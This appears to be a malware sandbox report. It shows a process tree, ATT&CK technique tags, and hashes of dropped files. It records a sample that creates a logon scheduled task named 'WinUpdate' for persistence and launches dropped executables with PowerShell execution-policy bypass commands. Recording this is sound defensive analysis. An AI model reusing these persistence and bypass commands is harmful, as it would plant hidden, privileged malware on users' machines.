                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"'
                                                                                                  5⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2296
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD2FF.tmp.bat""
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4772
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:2540
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout 3
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:3404
                                                                                                  • C:\Users\Admin\AppData\Roaming\WinUpdate.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\WinUpdate.exe"
                                                                                                    5⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4332
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kuzvch.exe"' & exit
                                                                                                      6⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4408
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        7⤵
                                                                                                          PID:2124
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kuzvch.exe"'
                                                                                                          7⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3916
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\kuzvch.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\kuzvch.exe"
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2364
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qijzoj.exe"' & exit
                                                                                                        6⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3160
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                            PID:1544
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qijzoj.exe"'
                                                                                                            7⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2348
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\qijzoj.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\qijzoj.exe"
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1876
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                9⤵
                                                                                                                  PID:2408
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\zgnutm.exe"' & exit
                                                                                                            6⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4884
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              7⤵
                                                                                                                PID:2876
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\zgnutm.exe"'
                                                                                                                7⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3464
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\zgnutm.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\zgnutm.exe"
                                                                                                                  8⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4552
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3656
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:3840
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3996
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3652
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                              PID:3752
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                              1⤵
                                                                                                                PID:532
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                1⤵
                                                                                                                  PID:1472
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                  1⤵
                                                                                                                    PID:1884
                                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                    1⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    PID:5004
                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:2292
                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                      1⤵
                                                                                                                        PID:964
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                        • Drops file in System32 directory
                                                                                                                        PID:4048
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                        1⤵
                                                                                                                          PID:4404
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:4716
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                            1⤵
                                                                                                                              PID:5108
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                              1⤵
                                                                                                                                PID:3224
                                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                1⤵
                                                                                                                                  PID:3604
                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:456
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:4376
                                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      PID:4160

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                      Filesize

                                                                                                                                      302B

                                                                                                                                      MD5

                                                                                                                                      e0138507740380b884252008c3099683

                                                                                                                                      SHA1

                                                                                                                                      648382426e694ce484edd0b2c71f3b19b655604e

                                                                                                                                      SHA256

                                                                                                                                      a335701b76f500115def3e1092c8df5be4dbd87b4069023e5e1def5426387889

                                                                                                                                      SHA512

                                                                                                                                      14a38fb0fe6e566bb8998f360a8171c8769c59fd9b5b51e39bfb02fdb9c5b4ab59e7070d5e6352e62af0ad705b85605de2ca63efa108e2a8671d1a89eace1e74

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                      Filesize

                                                                                                                                      1KB

                                                                                                                                      MD5

                                                                                                                                      5315900105942deb090a358a315b06fe

                                                                                                                                      SHA1

                                                                                                                                      22fe5d2e1617c31afbafb91c117508d41ef0ce44

                                                                                                                                      SHA256

                                                                                                                                      e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7

                                                                                                                                      SHA512

                                                                                                                                      77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      15KB

                                                                                                                                      MD5

                                                                                                                                      a2949cf4553763a72a828d396ad5dd31

                                                                                                                                      SHA1

                                                                                                                                      7ed1b017990d482ea57d1c715336923a148321b3

                                                                                                                                      SHA256

                                                                                                                                      957254144687b7bb216e8358d4831efd577e64f996f60262f99d44eab3c9c4d8

                                                                                                                                      SHA512

                                                                                                                                      d6f898400c72e1776f2b4cb393a9bd855d3c60399ed73f695cdc59600be141e1153c5c80f07cbada4e5da584def967af50f39516094fde36746197b1dbe088ac

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      15KB

                                                                                                                                      MD5

                                                                                                                                      9fcad29b39599c5afca8218f90fcd71f

                                                                                                                                      SHA1

                                                                                                                                      000194e4310b8e907170676a9174f31f4170b227

                                                                                                                                      SHA256

                                                                                                                                      9fd9f68cdfc6a40b1666aaafcfabdcb28461fd4bdae8e23d26dbc9327ca4112e

                                                                                                                                      SHA512

                                                                                                                                      a392e0522f53ecbcbc44e08ff2ea284d8f9fe5c8d87a8ac85b64a8477bc9f1226ada0fd7c1381a252525090b2ca068da1000b751323c903ec8b931ecc5ac6bd2

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      944B

                                                                                                                                      MD5

                                                                                                                                      9b80cd7a712469a4c45fec564313d9eb

                                                                                                                                      SHA1

                                                                                                                                      6125c01bc10d204ca36ad1110afe714678655f2d

                                                                                                                                      SHA256

                                                                                                                                      5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

                                                                                                                                      SHA512

                                                                                                                                      ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77svchost.exe

                                                                                                                                      Filesize

                                                                                                                                      45KB

                                                                                                                                      MD5

                                                                                                                                      a44a767dba207c04c74afae17144f787

                                                                                                                                      SHA1

                                                                                                                                      fa14f38216e259be5b181c825719f1c864691a5f

                                                                                                                                      SHA256

                                                                                                                                      26eaa5bce06cadc54cb4990fabb1b9150966ef720b07a836ef2bd456360246b2

                                                                                                                                      SHA512

                                                                                                                                      7dfd6e182ac9f16b29843cb0eabaa7db02fa3ee59c65c7822d9213859c4a7185d0fdcd1d51747a11b4fdd3a7947ea14fdc7fa583c13b4d3edf50b8d6d3178619

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Install.exe

                                                                                                                                      Filesize

                                                                                                                                      163KB

                                                                                                                                      MD5

                                                                                                                                      1a7d1b5d24ba30c4d3d5502295ab5e89

                                                                                                                                      SHA1

                                                                                                                                      2d5e69cf335605ba0a61f0bbecbea6fc06a42563

                                                                                                                                      SHA256

                                                                                                                                      b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

                                                                                                                                      SHA512

                                                                                                                                      859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kuzvch.exe

                                                                                                                                      Filesize

                                                                                                                                      661KB

                                                                                                                                      MD5

                                                                                                                                      2513e26d91a03e8fbcbfd8c3f4f11f80

                                                                                                                                      SHA1

                                                                                                                                      dabc1fc063c86d28d6b3313cbed51334bc90a0e0

                                                                                                                                      SHA256

                                                                                                                                      c62bc8ed1192add4a2ce16af0fe67dfe6a061b85c1176648a3ad9856b1744966

                                                                                                                                      SHA512

                                                                                                                                      56b55eefc9277ba83ba1f1b7fad87166a6d5b85266be5f4a3f35cd9af36a0f0c2c51011d3f6ed5acbf8f710fe7858ce81dc09878b1f791230795f0088f29e404

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qijzoj.exe

                                                                                                                                      Filesize

                                                                                                                                      95KB

                                                                                                                                      MD5

                                                                                                                                      bcbcb79606c1833ccef6ca77a7535936

                                                                                                                                      SHA1

                                                                                                                                      0fcbf9cd7ad1963736afac84cc56069654df3d42

                                                                                                                                      SHA256

                                                                                                                                      ce13808dad8149017d9dbc146681a99cd79aaa1288f890c9120a47c347c9db29

                                                                                                                                      SHA512

                                                                                                                                      20a3aa8046c8e3c93a9a55aa3750088da247abb11444883f8463aef0d347520c697067b5a8491de204310660cdb632b828d58898e4f65fd385cb1ec2da752391

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpD2FF.tmp.bat

                                                                                                                                      Filesize

                                                                                                                                      153B

                                                                                                                                      MD5

                                                                                                                                      68514a4c73217f6b01abefef349e4def

                                                                                                                                      SHA1

                                                                                                                                      e1375634f263e8329d214e18ad51e75029c5192d

                                                                                                                                      SHA256

                                                                                                                                      3e9b88345240228eb6c0c163b039377ddf459e5a3896191231ee8f3c6ac4532c

                                                                                                                                      SHA512

                                                                                                                                      8894685ed35d80af240fc57c47c7a347ec8dc88a3ec09fc8ea2a16124b36e804d693ebebf072d2a25b839652f8189920be63c579a50b8d36ec518246cf06f222

                                                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_2hzjo0ck.rkb.ps1

                                                                                                                                      Filesize

                                                                                                                                      60B

                                                                                                                                      MD5

                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                      SHA1

                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                      SHA256

                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                      SHA512

                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                      SHA1

                                                                                                                                      445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                      SHA256

                                                                                                                                      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                      SHA512

                                                                                                                                      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      1KB

                                                                                                                                      MD5

                                                                                                                                      aa187cac09f051e24146ad549a0f08a6

                                                                                                                                      SHA1

                                                                                                                                      2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                                      SHA256

                                                                                                                                      7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                                      SHA512

                                                                                                                                      960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

                                                                                                                                    • memory/220-9922-0x0000000140000000-0x00000001400AA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      680KB

                                                                                                                                    • memory/408-173-0x00000278C9740000-0x00000278C976B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/600-133-0x00000157C7970000-0x00000157C799B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/600-125-0x00000157C7940000-0x00000157C7965000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      148KB

                                                                                                                                    • memory/600-126-0x00000157C7970000-0x00000157C799B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/600-134-0x00007FFD26FD0000-0x00007FFD26FE0000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/600-127-0x00000157C7970000-0x00000157C799B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/676-145-0x00007FFD26FD0000-0x00007FFD26FE0000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/676-144-0x000002AFF2E90000-0x000002AFF2EBB000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/676-138-0x000002AFF2E90000-0x000002AFF2EBB000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/956-158-0x00007FFD26FD0000-0x00007FFD26FE0000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/956-157-0x0000017837CD0000-0x0000017837CFB000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/956-151-0x0000017837CD0000-0x0000017837CFB000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/1020-168-0x000001D045EC0000-0x000001D045EEB000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/1020-162-0x000001D045EC0000-0x000001D045EEB000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/1020-169-0x00007FFD26FD0000-0x00007FFD26FE0000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/1048-116-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1048-117-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1048-121-0x00007FFD66D90000-0x00007FFD66E4E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/1048-122-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1048-114-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1048-115-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1048-119-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1048-120-0x00007FFD66F50000-0x00007FFD67145000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                    • memory/1820-9906-0x000001792CB20000-0x000001792CB74000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      336KB

                                                                                                                                    • memory/1820-5913-0x0000017912330000-0x00000179123DA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      680KB

                                                                                                                                    • memory/1876-5105-0x0000000005990000-0x0000000005A9A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/1876-5101-0x0000000005DD0000-0x00000000063E8000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.1MB

                                                                                                                                    • memory/1876-5099-0x0000000000C40000-0x0000000000C5E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      120KB

                                                                                                                                    • memory/1876-5102-0x0000000005690000-0x00000000056A2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/1876-5103-0x00000000056F0000-0x000000000572C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      240KB

                                                                                                                                    • memory/1876-5104-0x0000000005730000-0x000000000577C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      304KB

                                                                                                                                    • memory/2364-5000-0x0000022D5EB10000-0x0000022D5EB66000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      344KB

                                                                                                                                    • memory/2364-5002-0x0000022D77070000-0x0000022D770C4000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      336KB

                                                                                                                                    • memory/2364-1015-0x0000022D5C9B0000-0x0000022D5CA5A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      680KB

                                                                                                                                    • memory/2364-1019-0x0000022D76F10000-0x0000022D7701A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/2364-5001-0x0000022D77020000-0x0000022D7706C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      304KB

                                                                                                                                    • memory/2468-0-0x0000000000400000-0x0000000000453000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      332KB

                                                                                                                                    • memory/3464-5226-0x0000000006560000-0x00000000068B4000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.3MB

                                                                                                                                    • memory/3668-110-0x000002674D890000-0x000002674D8B2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/3668-111-0x000002674FDD0000-0x000002674FDFA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/3668-112-0x00007FFD66F50000-0x00007FFD67145000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                    • memory/3668-113-0x00007FFD66D90000-0x00007FFD66E4E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/3916-965-0x0000000004F80000-0x0000000004FB6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      216KB

                                                                                                                                    • memory/3916-985-0x0000000006100000-0x0000000006454000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.3MB

                                                                                                                                    • memory/3916-979-0x0000000005E00000-0x0000000005E22000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/3916-967-0x0000000005720000-0x0000000005D48000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.2MB

                                                                                                                                    • memory/3916-986-0x0000000006570000-0x000000000658E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      120KB

                                                                                                                                    • memory/3916-980-0x0000000005EB0000-0x0000000005F16000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/3916-987-0x00000000065B0000-0x00000000065FC000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      304KB

                                                                                                                                    • memory/3916-988-0x0000000006B20000-0x0000000006BB6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      600KB

                                                                                                                                    • memory/3916-989-0x0000000006A80000-0x0000000006A9A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      104KB

                                                                                                                                    • memory/3916-990-0x0000000006AD0000-0x0000000006AF2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/4332-921-0x0000000006D40000-0x0000000006D5E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      120KB

                                                                                                                                    • memory/4332-898-0x0000000000C30000-0x0000000000C42000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/4332-899-0x00000000060D0000-0x0000000006674000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      5.6MB

                                                                                                                                    • memory/4332-900-0x0000000005B20000-0x0000000005B86000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/4332-919-0x0000000006C80000-0x0000000006CF6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      472KB

                                                                                                                                    • memory/4332-920-0x0000000006C00000-0x0000000006C62000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      392KB

                                                                                                                                    • memory/5032-811-0x0000000005830000-0x00000000058CC000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      624KB

                                                                                                                                    • memory/5032-100-0x0000000000E10000-0x0000000000E22000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/5032-99-0x000000007523E000-0x000000007523F000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB